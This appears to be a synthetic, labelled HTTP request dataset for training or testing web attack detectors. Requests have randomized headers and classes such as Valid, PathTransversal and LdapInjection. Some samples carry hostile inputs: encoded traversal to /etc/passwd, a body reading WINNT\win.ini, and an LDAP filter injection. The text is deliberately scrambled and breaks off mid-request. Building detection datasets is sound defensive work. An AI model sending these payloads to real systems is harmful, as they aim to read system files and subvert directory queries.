GET /reHNyTT/hset4s1TtoingraK/xefmaOMD@-9Cn21P62/hcK8xpR_7GE7UvJNFSyL/a0hobeSne/WS/sDl2zOirmRdreett/lJdGm7kAEsf/pz5J4caXilPPrsvCmG/etwtptssiisR92haEoSa/i7T6u9.dll?Mj5xPhttpse=16675&eayyndh2wm=p%5D%3C98+eev-s&afsadse=yn2ebeertuuh5k3sc HTTP/1.1
Host: www.oytfie.fr
Connection: close
Accept: */*;q=0.9
Accept-Charset: x-mac-turkish
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 133.173.34.181
Cookie: NueoOgt4yRee=1286010108;Isuowc=127063;ns3Oth=t-zxter3a;catYgCMQPGu6=f5z5Kn;eetsaPvd=@e
Cookie2: $Version="2"
Date: Sun, 20 Jan 08 11:20:45 UTC
ETag: "0UqNPLqi-mZTG-Z3x"
Expect: Iarrwr=xhnQaptl;slhU=88n7sn
From: kaat@losa.de
If-Modified-Since: Fri, 19 Dec 08 19:04:47 UTC
If-Unmodified-Since: Tue, 19 Oct 04 14:39:57 UTC
If-Match: "wA@rVemIkQxy-Xz"
If-None-Match: "ZvZVLFIZdMjcl0dz"
If-Range: "9_hERrtyEmbw6UDv"
Max-Forwards: 3
MIME-Version: 5.6
Pragma: Ll0edtt=I5
Proxy-Authorization: Basic ZWk2NWE0YTpzdG9tZTJodA==
Authorization: ger0 oco9rHhe=h9amee
Range: -81240,-211
Referer: /DIAu2aih/anpfsttr/Eeum/5iatgim.nsf
TE: chunked;q=0.5,trailers
Trailer: Cache-Control
User-Agent: Mozilla/4.8 (Windows; U; Win 9x 9.5; sc-fq; rv:3.3.0) Gecko/00211520
UA-CPU: x86
UA-Disp: 722,0517,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 006x597
Via: 2.5 www.A1ona1n.html, HTTP/2.0 www.kaeNhqea.htm, HTTP/1.6 214.34.28.99
Transfer-Encoding: deflate
Upgrade: Oiesa/5.8, 9pi/5.8
Warning: 937 31.191.36.176 "hsE3hbigjqoebo7" 
X-Forwarded-For: 235.235.43.82
X-Serial-Number: 26172268
----: ------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 13771
Start - Id: 34421
class: Valid
POST /ev4mC/LedorNsKWjimg.Zn/cPm_45Fhkh/xMhNyhWTXClO/tuLn/iI7fJ@tqQjBC.VB_/8aetoett3bsfowes.html? HTTP/1.0
Content-Length: 119
Content-Language: nenhon
Content-Encoding: gzip
Content-Location: http://nhwamD7.ch/exnN.php
Content-MD5: bUxvbGFtZDFuZnFpcmxpcA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 12 Feb 06 22:43:41 CET
Last-Modified: Fri, 02 Sep 05 15:31:17 CET
Host: www.wneleas.biz
Connection: keep-alive
Accept: application/zip
Accept-Charset: *;q=0.4
Accept-Encoding: identity;q=0.7, identity;q=0.2, identity, gzip;q=0.2, gzip
Accept-Language: ualgi-ezeahx, wm-aa, o2a7m-4NnyS4tE;q=0.0
Cache-Control: no-transform
Client-ip: 84.198.178.247
Cookie: uhito=mFo;0OjKvbscript@=083;varezvW=eoc;2w-R932UZ=058;dOmkbce82m=eg@g6dqoN7VP;uno=mAQMTN7Q
Cookie2: $Version="64"
Date: Wed, 14 Apr 10 10:41:53 CET
ETag: W/"klRyVC@w2mtJQIc5LX"
Expect: 100-continue
From: tirtg0@rhu1.org
If-Modified-Since: Mon, 24 Nov 08 05:15:08 GMT
If-Unmodified-Since: Fri, 17 Sep 04 24:29:36 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 02 May 04 22:53:41 GMT
Max-Forwards: 191
MIME-Version: 8.4
Pragma: t=md4
Proxy-Authorization: NTLM NGVlYWllZmRpc3pycm5lRW9OZWhlZnFtZnRFc2NyckVlcw==
Authorization: NTLM bHQzZHRhVXRkMXNib3JhTTNzb2U5OXR6bWhlWmU5ZTQzTGw1cmw=
Range: -2,-34,732-
Referer: http://hrfeirm.org/coajhvg/bsOe/tSst/9tuoe.asmx
TE: chunked;q=0.2,gzip;q=0.7,chunked;q=0.8
Trailer: If-Match
User-Agent: oniamH
UA-CPU: StrongARM
UA-Disp: 7247,384,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 995x932
Via: rVa/8.8 www.vwhr.js, rhi/9.7 172.208.145.45
Transfer-Encoding: compress
Upgrade: uurtm/9.2, nNnn/0.6, rca/0.5
Warning: 076 www.tlWems.gif "aretamgt" 
X-Forwarded-For: 229.28.6.246
X-Serial-Number: 3756270
----: -----------
~~~~~: ~~~~~~~~~~~~~~

1aud=Y ert&geet=eth2crjiehiano&c7nliEyCnZUaytp=&gmohaving&rrfl63jep=pwoeaHotee9iir&Eot4Nsj=6713518&medEEnsdwrmne4=opN

End - Id: 34421
Start - Id: 25761
class: Valid
GET /t0tQHizneyg/lle-jXCpIdbQeU1O/49Bvmaauh/rwvq_-6h/dlkAi/adantifeqOsnthne/cltcSnzhsstdtesatem/group byydeleteT/rcpz/nodtEidieyahlYlNe9wL.htm?tbtsrAn95=gizlog&perneiwao=3oizAqaPDs&EnvsystempEetctmp5OX=+u&pissrepeec=rpetiiov&svssedodae=0862&nielEie=m%29&Ors9dma7b=ias6o1c8g&qaSbsetfrunreo=eJy&99bot=74&8andoQuPscriptimgOuI=379649&swir8eg=8130313&cb3rysno9i9ehhn=deDc+updates%3Ce HTTP/1.0
Host: 66.110.133.90:5
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: x-ni24a3Er;q=0.4
Cache-Control: no-store
Client-ip: 231.14.230.156
Cookie: otstaeatv9xO5=obe;eu3ya=rnph-tazm qdihlAs;nanrazreocttros=008864;69=422
Cookie2: $Version="44"
Date: Sun, 14 Jan 07 20:28:10 GMT
ETag: "gf2@jsL8LOXbQsk0Apxo"
Expect: 100-continue
From: wsit@mwmse.com
If-Modified-Since: Sat, 17 Apr 10 16:57:48 UTC
If-Unmodified-Since: Wed, 04 Jun 08 22:24:10 GMT
If-Match: *
If-None-Match: "lUSPS3LP75pmmU7"
If-Range: *
Max-Forwards: 1
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: Basic ZlRtYTllaWU6ZTdzcnBvdXQ=
Authorization: m3oA f3its=cteerth
Range: 0846-,55-
Referer: http://ehel.net/sdtstUtw/a6mt.mpg
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/1.1 (compatible; Konqueror/8.3; Unix; ualbt2; tgnea)
UA-CPU: MIPS
UA-Disp: 281,591,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 0106x257
Via: eho/8.2 46.116.75.50:399
Transfer-Encoding: deflate
Upgrade: ceULo/2.9, itmu/9.5, m6nr5/9.3
Warning: 268 163.124.255.0 "nasf3oeerheogae" 
X-Forwarded-For: 249.109.166.6
X-Serial-Number: 63082151043081
----: ------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 25761
Start - Id: 14688
class: Valid
GET /sdF7jP/j3omrk/yIhI-KA87uDz/trkTJ_.Yh8VwhvdW12/h2xpzso4ie2/aM3wCgaEd8JBnDsQ/nvTosrowsiehhGignrr/XYG-.html?fs51dNo=oqlu&union-DdivGconnectO_N=t43SeHMp&eiuefl=ldniEs8mtter&asobb=+gesWrl&JliperleuJauuaq=yDUEL&tcufa98e=tjukOg8.p1&lsatIaetutck=p7nhyeasd&wnof5eepa=h&aO5pr13atsa=eKmFh3Zc1_ay&VinputU9XCfMvk=tC0aojK HTTP/1.1
Host: 67.60.47.205:27
Connection: keep-alive
Accept: application/*;q=0.9, application/*, application/*;q=0.3
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: imnuitt-d, Plijsodr-hawtai, ln-i1otb;q=0.0, r3eath-mhbeytt, nTh-rces;q=0.4
Cache-Control: max-stale
Client-ip: 13.86.30.219
Cookie: 4whEEhleryt2=658913541;Eed38ho=653
Cookie2: $Version="0"
Date: Sat, 09 Sep 06 18:49:02 GMT
ETag: "uHBn0QQncCl0QP7G0hfy"
Expect: yapnsalx=ezf0t0n;h9uen
From: ew4dDBs@eoeatshefo.uk
If-Modified-Since: Mon, 26 Jan 09 23:16:49 CET
If-Unmodified-Since: Fri, 18 Sep 09 14:51:01 UTC
If-Match: "jYQU0Q3oWYvQlfKiM"
If-None-Match: "PznovYQ1AeCq0UG"
If-Range: Sun, 06 Mar 05 24:47:51 CET
Max-Forwards: 09
MIME-Version: 8.7
Pragma: Tcoo3ac='NiH'
Proxy-Authorization: EOoh Ellxd=Dta1et4X
Authorization: NTLM bGRTb2hlcjg4c29yYnBuc3Rpc29USmdhb2N0YXQ5YVF0cmdzMHR3Yzhzc21wT2Ft
Range: 07-
Referer: /dtEe.asmx
TE: chunked
Trailer: Cache-Control
User-Agent: th1gem0lipstisfsOdu
UA-CPU: x86
UA-Disp: 1207,004,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 0368x227
Via: 6.9 www.iedtPfis.js, FTP/3.7 www.2eaicMus.png, i5da/6.0 203.200.197.200
Transfer-Encoding: identity
Upgrade: f01ie/0.8
Warning: 475 255.62.238.61 "aoneo" 
X-Forwarded-For: 90.226.61.85
X-Serial-Number: 5935364150091795
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 14688
Start - Id: 46239
class: PathTransversal
GET /ykGSSC-bGpBpMz2/ooCidueg/es1jrehgsgems/usszx@oTgM5KTigrpXM/eioasi5e/ojL/sA0/g7t3/mfgXy.swf?osynaareurn=%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd HTTP/1.1
Host: www.onaueztlxb.net
Connection: Eote
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip, compress
Accept-Language: 8eC-e;q=0.3, rxnmotg-o;q=0.4, aib-bneoe;q=0.6, irfeh-t;q=0.6
Cache-Control: max-age=36
Client-ip: 122.209.218.115
Cookie: IweLJP@JheFscript=en8lG2ii
Cookie2: $Version="8"
Date: Fri, 17 Oct 08 20:28:58 CET
ETag: "uVWqFjF1f7c@HvfRr"
Expect: hoahd=l6nt2Ete;SDpta=EeAen5
From: eftra@neleobejy.com
If-Modified-Since: Fri, 06 Aug 04 06:28:18 CET
If-Unmodified-Since: Fri, 11 Nov 05 23:47:50 GMT
If-Match: "sbc94y7.K7rZN.IEdv"
If-None-Match: *
If-Range: Tue, 15 Dec 09 08:23:57 UTC
Max-Forwards: 644
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: oai3ur uAhsme=hhieet
Authorization: Basic bzZpbTdpZDpKa3VydGg1bQ==
Range: 173-
Referer: http://n9ie2ets.ch/oenutiti.mpg
TE: trailers
Trailer: Accept-Encoding
User-Agent: oq.R4TG http://www.e3ofef.biz
UA-CPU: 68000
UA-Disp: 3006,9406,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 7340x8822
Via: 5.9 194.136.148.206, iis6mO/4.7 www.vInnB.png
Transfer-Encoding: gzip
Upgrade: Sdb/4.1
Warning: 061 www.aomelt.jpeg "e3tta" "Tue, 23 Jan 07 20:12:20 GMT"
X-Forwarded-For: 29.166.94.55
X-Serial-Number: 79986231728889
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46239
Start - Id: 38805
class: LdapInjection
GET /2uHPsamk6unionRJa.js?eoebOnz0ttZ=7867&oeEh4htfnto=01077&miTihthMrPao=f&SylikejOGp=cy+yisne&oulrsitoe=ehD8enu%5Ciea2c&noty9eql=48500&7x6rxiidc=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29 HTTP/1.1
Host: www.rero.biz
Connection: close
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: h-sut0do;q=0.9, w7lapoeo-euwde;q=0.7, eoTlino3-rsea2ed, er-tdm
Cache-Control: no-cache
Client-ip: 103.147.207.153
Cookie: sdiarlygarophic=NeT;hOg2ceo4f=anm2oio;otIb5mtu= dbgsoundft;tm3dscc=i6tm3sxo;ata=qs
Cookie2: $Version="055"
Date: Thu, 18 Mar 10 01:33:02 UTC
ETag: "954BYt15GW0-QKluibg"
Expect: stgenha=alean
From: yRoml@orAqOa.ch
If-Modified-Since: Tue, 23 Aug 05 15:15:36 CET
If-Unmodified-Since: Thu, 11 Mar 04 20:22:53 GMT
If-Match: *
If-None-Match: "ysKomA0DHbx6d0WQ"
If-Range: Mon, 30 Jul 07 08:42:50 CET
Max-Forwards: 641
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: NTLM RW1rbmlpc2hoaTFzOUlldHNFZmF4c25ob3RlNm9qbHNjcG43ZQ==
Authorization: Basic b29UcnQ6cG1jdA==
Range: 929605-5,-089,269-624
Referer: http://tslc.fr/oeaIen/bregSer5.swf
TE: trailers,trailers,trailers
Trailer: Accept-Language
User-Agent: Mozilla/2.6 (X11; U; Linux i586 2.9; Eg-TH; rv:3.9.1) Gecko/15748513
UA-CPU: StrongARM
UA-Disp: 754,7315,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 8161x590
Via: 9.9 134.21.37.89, 7nr/4.1 www.aWsu5Ryu.jpeg, FTP/0.4 www.estts.png
Transfer-Encoding: deflate
Upgrade: oorig/6.0, osraet/4.0
Warning: 492 17.108.254.89 "nam6dyTtRno" 
X-Forwarded-For: 199.212.3.152
X-Serial-Number: 323337935267147
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38805
Start - Id: 45382
class: PathTransversal
POST /so9ottmmuufqedeqoan/BGHvnULwp-Ko/rwsuteJ3ohua4gni.js? HTTP/1.1
Content-Length: 36
Content-Language: r,0AbfnhrG,jiids
Content-Encoding: compress
Content-Location: http://e4slsn.it/nhttocy/jolsoiE/wtc1eo/smooeaOe.shtml
Content-MD5: dHpzbGRvdHN0Q3JhZWNubQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 20 Apr 06 22:48:51 CET
Last-Modified: Mon, 31 Mar 08 23:07:21 CET
Host: www.itesap.fr:80
Connection: omlean
Accept: text/*;q=0.6
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: no-transform
Client-ip: 11.159.255.187
Cookie: xSJbBs8BhTW=99;tl=26746;r7=:len
Cookie2: $Version="96"
Date: Tue, 09 Oct 07 14:03:24 GMT
ETag: "5ocwXgsgWGwq92x.Rvo"
Expect: oepa
From: nnrEog@dpyieuR.com
If-Modified-Since: Thu, 10 Jun 04 14:12:45 UTC
If-Unmodified-Since: Mon, 16 Nov 09 20:39:38 UTC
If-Match: ".8OJH7-Crdvuffy_wPn"
If-None-Match: "DF49oJ3fqIoHh-M"
If-Range: Tue, 24 Mar 09 03:15:55 GMT
Max-Forwards: 00
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: NTLM cGVsYW9ldGxJMjRyb21pc2lpYXhpbWxyZG5lZHVsc2VpN2FlSGM=
Authorization: Basic ZXJldHI6Y3ppZWU4cG8=
Range: 0524-
Referer: /o8avmEen/wraro/tLlassu/aetZ/hsfeto.asmx
TE: trailers,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/5.8 (Windows; U; WinNT 2.8; rh-lt; rv:7.8.8) Gecko/12509543
UA-CPU: Sparc
UA-Disp: 721,775,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 789x027
Via: 2.3 www.vt43f.tiff
Transfer-Encoding: gzip
Upgrade: y6otbe/1.0, A4me31/2.9, Aloea/2.4
Warning: 851 99.105.244.225 "ewewAqyftpmnve" 
X-Forwarded-For: 177.133.223.189
X-Serial-Number: 37550564020499
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

ael8ebB=o:\\WINNT\\win.ini

End - Id: 45382
Start - Id: 25612
class: Valid
GET /tiintwad8hkzt73/sTxf/kNZ2EV3Jsystemswl/h5Oao/gKshutdownKPuSRrwp-CqMPq/exayc6lt0iiid8nhyuo/ttnoloips.asp? HTTP/1.0
Host: www.lfi0fl.org
Connection: Nzw2tmt
Accept: */*
Accept-Charset: x-mac-arabic;q=0.7, iso-2022-jp, iso-2022-kr, x-mac-japanese, iso-8859-1;q=0.7
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale=555
Client-ip: 70.74.10.34
Cookie: U2UFbKE6XU=t E
Cookie2: $Version="92"
Date: Mon, 09 Apr 07 24:07:07 CET
ETag: "77kb4B5Tx-Kidlr"
Expect: o51lPsi=ojng4
From: 0hi6jdg@0eiMas.net
If-Modified-Since: Sat, 13 Jan 07 05:58:35 CET
If-Unmodified-Since: Tue, 24 Jul 07 16:07:33 GMT
If-Match: "lmnFfJnF3JJUCEEPMm"
If-None-Match: *
If-Range: Sun, 04 Apr 04 11:50:44 UTC
Max-Forwards: 58
MIME-Version: 6.8
Pragma: lQymttco=cyternr6
Proxy-Authorization: NTLM dG95ZXM0ZW1TbDVPZXRpckV0eW1haUF3Y3hjc3N4Y2V0dGVjb2k=
Authorization: Digest username="rtpsd0r"
Range: -1684
Referer: http://www.3set.org/aOhioEes/oidts/Fi4sn3rp/rfeimmw/z3ue6sh.pl
TE: gzip;q=0.0
Trailer: Cache-Control
User-Agent: Mozilla/2.1 (compatible; MSIE 2.8; Linux i586; uhteme)
UA-CPU: 68000
UA-Disp: 8439,526,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 1157x6904
Via: HTTP/0.6 148.130.183.130, 0.0 137.217.0.49:638, 5.4 207.18.139.85
Transfer-Encoding: deflate
Upgrade: rNjc/2.0, qdsuma/2.4, aee/6.0, ooi/8.6
Warning: 650 136.91.203.255 "ymolni9b19rts" 
X-Forwarded-For: 255.93.182.143
X-Serial-Number: 400505966006
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25612
Start - Id: 34069
class: Valid
POST /9aniennceulArlOxaha5/J3GOYchildwjk6.php? HTTP/1.1
Content-Length: 92
Content-Language: altzten
Content-Encoding: gzip
Content-Location: /umre/w4ea/9heGl/rbneetoU/etsiu.zip
Content-MD5: d290YXJ5b2FhbW5mb25zYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 01 May 06 15:40:47 GMT
Last-Modified: Wed, 04 Mar 09 24:34:48 CET
Host: 245.55.149.135:80
Connection: keep-alive
Accept: image/*, application/*;q=0.0, application/*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 239.85.198.102
Cookie: wDxrDJpI=[bunionion\tvrs[od;Ant7=zw3;sehwbooortpasswdmrw;nafTnetsec=ddpIS8BARr;rcshhoAewld6=nVl;indtzh1iSeoevc=fnm
Cookie2: $Version="13"
Date: Fri, 21 Jan 05 02:25:51 GMT
ETag: W/"xO92uavFzjswVlOknz"
Expect: 100-continue
From: neWsewfp@g2wonlae.fr
If-Modified-Since: Tue, 13 May 08 14:01:49 UTC
If-Unmodified-Since: Tue, 15 Jun 04 06:33:18 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 23 Apr 06 07:17:14 CET
Max-Forwards: 114
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: noe8lh ucee=Ansbi
Authorization: Digest uri=/yEKlm/aedests/hwtlE0o/eqsa0/aydt.sh
Range: -1571,35028-798,-78661
Referer: http://www.dltao.net/Setthwe/eihsr/hHe9g2ai/jennthzi.mdb
TE: trailers
Trailer: Accept
User-Agent: nqA1lizq http://www.os3ape.org
UA-CPU: x86
UA-Disp: 2533,0787,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 9061x3656
Via: FTP/5.6 www.todih.png, 7.8 129.51.186.5, FTP/1.1 www.ty8iaH.jpeg
Transfer-Encoding: deflate
Upgrade: qhe6/5.5, Ndaod/1.6, zcbn/9.5, tweeah/0.8, v9imgh/0.4
Warning: 657 www.eWibEanz.tiff "iaEat" "Mon, 06 Jul 09 07:37:50 GMT"
X-Forwarded-For: 217.182.237.209
X-Serial-Number: 155066
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

rdloae7oh=ht htpass&f4nt=ntup20h&alnv2OucrIneo=051948&ot=3&-NWSyaxyM=ipdsIwlzuNt&dGXlhw=ptJW

End - Id: 34069
Start - Id: 13689
class: Valid
GET /sotemreo71snM/CUevalGnetcatS/oQeRU/vpABh/ttsah8o/7sh2otInjtcnNowE/R_YTUnaa@30/535/eaeosiitmayaelvh8/copyDcXhtpassS.JJDP3mnZ/ri.bin?rrtneeo=sjEtgidcp0Ttfs&bVqposition@70m5qXC=u%3C&mikhRtsswttshu=rMJ&tvNuOhT9rAh=anetcatle3Sh3oa&iy4awgin=662918&sobl=tautoexecp6iea-iUqllle&hlqdglee2=6892&nC=A++&wdan2ufsasn6lr=fr5v&TxlMI=64010152 HTTP/1.1
Host: www.Taosxmotn.org:805
Connection: nWfy
Accept: audio/basic;q=0.0
Accept-Charset: windows-1252, x-mac-arabic, x-mac-icelandic;q=0.6, x-mac-turkish
Accept-Encoding: 
Accept-Language: he-kiht;q=0.5, 9i-ntahi;q=0.0, CalsRgta-h5;q=0.5
Cache-Control: max-age=571
Client-ip: 225.55.25.65
Cookie: kt=Snd6spAfLtceksN4e
Cookie2: $Version="08"
Date: Tue, 22 Sep 09 02:16:37 CET
ETag: "MJ3ojwdKTR@NuG9Wx0dY"
Expect: 100-continue
From: o0psooo@vlbfyo2.st
If-Modified-Since: Fri, 31 Oct 08 23:51:55 GMT
If-Unmodified-Since: Tue, 27 Apr 10 05:04:26 CET
If-Match: "6gfP-lFeoCkf.JIwVy"
If-None-Match: *
If-Range: Wed, 25 Jun 08 09:07:15 UTC
Max-Forwards: 5
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: Basic c251dXl0OmdoempzdQ==
Authorization: s0oiHh O7Mzit=q03lD
Range: -922184,573-
Referer: http://8prnyc.org/z7c6k/yixidr/1tnMy/rop1oo8.htm
TE: trailers,trailers
Trailer: Authorization
User-Agent: Mozilla/1.1 (Machintosh; U; PPC 7.8; Mg-qt; rv:8.2.6) Gecko/85689167
UA-CPU: Sparc
UA-Disp: 2040,5971,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 757x935
Via: 3.1 93.246.85.194:2596
Transfer-Encoding: gzip
Upgrade: ztst8/6.0, emn/7.0, die/9.5
Warning: 757 36.29.209.66 "rvr2" 
X-Forwarded-For: 145.31.187.12
X-Serial-Number: 1852790108043394492
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 13689
Start - Id: 7555
class: Valid
PUT /1A_6KEw1Io9CJoiNkLHL/aQ2c3F4Q2WhuO/etiicTvOeea/oi@h46I8.bTJyvIj2@B/mm/gnhnoshh2serRttNol/dlKJgcdKTPemx55Dz.php? HTTP/1.0
Content-Length: 377
Content-Language: raeEYtco,L,thItNeu
Content-Encoding: gzip
Content-Location: http://lihe.biz/woibt/nhdxe/ents/nmce.nsf
Content-MD5: dHRkaXJmaG9qamVjYnNsZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 17 Jun 05 07:12:38 GMT
Last-Modified: Thu, 10 Jul 08 23:13:41 UTC
Host: 68.130.52.195
Connection: close
Accept: application/x-tar;q=0.2, application/*
Accept-Charset: utf-7;q=0.4, big5, x-mac-turkish
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: only-if-cached
Client-ip: 13.235.197.251
Cookie: DB33=gmnsmnh33;too=fwinntswp-e~t;.72rX7kvM=22505;0giheN8t=0062;Xakd=scrlo6e;EMo7=n
Cookie2: $Version="8"
Date: Wed, 13 May 09 13:26:10 UTC
ETag: W/"3M9aOoOa8PbHxPm"
Expect: jh9wceix=inmii;Rreo=wjhit
From: nanSyva@xAweeehqTs.de
If-Modified-Since: Tue, 22 Sep 09 21:05:29 CET
If-Unmodified-Since: Fri, 30 Apr 04 15:27:43 UTC
If-Match: "oZXk7vg5OefTZLeCv"
If-None-Match: *
If-Range: Tue, 27 Nov 07 24:20:21 CET
Max-Forwards: 7
MIME-Version: 1.7
Pragma: ha=emin
Proxy-Authorization: NTLM d2llb2V3b3ZodXNkb3RkVGFFaGJoMHFsbnVxbG1hbXQyc2V6b2hoYQ==
Authorization: Basic YmVpMXA6RWdydGhpYQ==
Range: -9533
Referer: /eiroii/y3xe.php3
TE: gzip,chunked;q=0.2
Trailer: Via
User-Agent: a2dHx0 http://www.eUcpecp.de
UA-CPU: x86
UA-Disp: 845,5230,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 8581x949
Via: 4.8 www.Htmic.tiff, tSrpx/9.6 150.112.80.5, HTTP/5.2 236.212.17.115
Transfer-Encoding: identity
Upgrade: Tbwl/8.0, e3IaS/2.0
Warning: 941 www.iwtiiS0h.gif "3Da2pusC" 
X-Forwarded-For: 191.61.229.46
X-Serial-Number: 49024
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Ane=eain&0oeninoaotdakts=g_NM2ta&OErs=2allzndzht &includeee|)&eest==sAlcksy]8processing-instructionEnbetweentmpoopeneopt&mnVCgorBOq@N=772&y5me4yyai6ta=eprocessing-instructionad'&cotIvfWtdArmn=5rlzoaeOorka&beoIan4f4moa=5exRU6-hDVr_&t3nt2eeseeound=9qottNNwxmaanoshs&Fxp_V6SX=isikpn7sr&ga7N=o2onsioi&WgJiso=hbetweenlu&bYSycJ=ecf-wR&ieIsyt=cTvCa2JK.YQ&tnB6mae1m5321ti=h

End - Id: 7555
Start - Id: 9607
class: Valid
GET /Asihxane7yoooa/zeM69FBLat/iqm3cvfUK14Sjw6q/efj/nt3EbFj/tbhx3DIsR@/9CZ_dB/qsuXi@/sT6RYLeQ3Au_/DyecntS.jsp?wssaouskhtTDg2m=-Dexechencb%3Ft++ettbinimgy HTTP/1.1
Host: 218.141.146.28:3
Connection: tZe7u
Accept: text/html
Accept-Charset: iso-8859-6;q=0.3, x-mac-ce, x-mac-chinesetrad;q=0.2, iso-8859-6;q=0.8
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.1
Cache-Control: min-fresh=06102
Client-ip: 10.102.108.131
Cookie: eaaee5nvovxdn=5713546
Cookie2: $Version="40"
Date: Tue, 09 Aug 05 05:16:50 UTC
ETag: "Z0xxwaW4lTUQ8yUbSmS"
Expect: cda98r=Ytpte;nmoOc=pieae
From: wsedel@fte2.org
If-Modified-Since: Thu, 28 Aug 08 08:11:38 UTC
If-Unmodified-Since: Sun, 27 Feb 05 03:07:18 UTC
If-Match: "Re686qYfm3LtRLu"
If-None-Match: "5f1wxKGVUovBRRCbAb"
If-Range: *
Max-Forwards: 0
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: iOexxu luao7=rm6admp
Authorization: Digest uri=/iedearde/Winetti/0o2rk/aAfr1u.asmx
Range: 218320-0,0-,8-66598
Referer: http://www.0canUw.net/yraiqt.jsp
TE: deflate,trailers,chunked
Trailer: Warning
User-Agent: 0pdyr6cf/6.8.0.2.7
UA-CPU: StrongARM
UA-Disp: 8659,744,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 7520x0183
Via: 0.7 www.sute.gif, 3.7 30.252.219.156
Transfer-Encoding: R3dc
Upgrade: bcr1b/9.3, ol1eo/8.4, etne/3.1, Bs3rt9/5.7, aio/1.0
Warning: 004 www.qaG5rro.jpeg "9mp7el34osnrooE0a" "Sat, 23 Aug 08 06:38:14 CET"
X-Forwarded-For: 127.233.244.196
X-Serial-Number: 0359869
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9607
Start - Id: 17470
class: Valid
GET /tWYn/ihcuhogcoouac/hMoseNdfq-/rPGIzkp@o6Cq9dM_mh_.tiff?6pNXOT=qertNUt8w8o%3Fashutdownc&mhlft=Dnhselectnrm&ee75tsoibee=5482663986&0e=vcb_Xg&grd2ee=ceanel-fnph-r%5C&n7ndtcuEKb=d%3F8sfoie&fnwrt3aa=eAv.Qr&9ViketcXw_kf=mweeswnb7eds&9eyq8d7ht9Nh=%3Ctan&yaiakoon6n=69&ncaccess_logGVM4nnk=06159943 HTTP/1.1
Host: 91.241.62.238
Connection: tegweess
Accept: audio/basic
Accept-Charset: x-mac-turkish;q=0.1, cp-950, ks_c_5601-1987
Accept-Encoding: compress, gzip;q=0.9, gzip, compress
Accept-Language: cie-du
Cache-Control: no-cache
Client-ip: 97.68.166.85
Cookie: hvdottaf=mR(cow;3ka=54882;v116Mitbi=hnm1srb6itngds;7BlibUSB-7=7075352601;cysedmGrtqh1=lyvbZHB9
Cookie2: $Version="41"
Date: Fri, 19 Oct 07 12:27:45 CET
ETag: "qihkTs1NzFJxmgZV"
Expect: aunieea5
From: tNsfulie@nnnmlx.gov
If-Modified-Since: Fri, 22 Oct 04 05:06:59 GMT
If-Unmodified-Since: Sat, 26 Nov 05 24:11:26 GMT
If-Match: "3RCDWjIhFfTcPJGtnRJ"
If-None-Match: "22zmgpXDcANqG-S"
If-Range: Sun, 11 Apr 10 01:34:32 GMT
Max-Forwards: 943
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: NTLM RXNzaXR0aWFpZXpycmVkZHdvMGtJZGxpZWhoZW9nb3QzMWFidHRiZXJhYUxuaGc=
Authorization: Digest uri=http://www.iNnoeIh.it/jsef4/Ut2o8Nn/qtfuv/slafUno/aolnfu.php4
Range: -46060,-501912,285072-125
Referer: http://www.atji.com/owsy/rhnrem/eoTb/Ztee3/neyoy7t.rar
TE: gzip;q=0.5
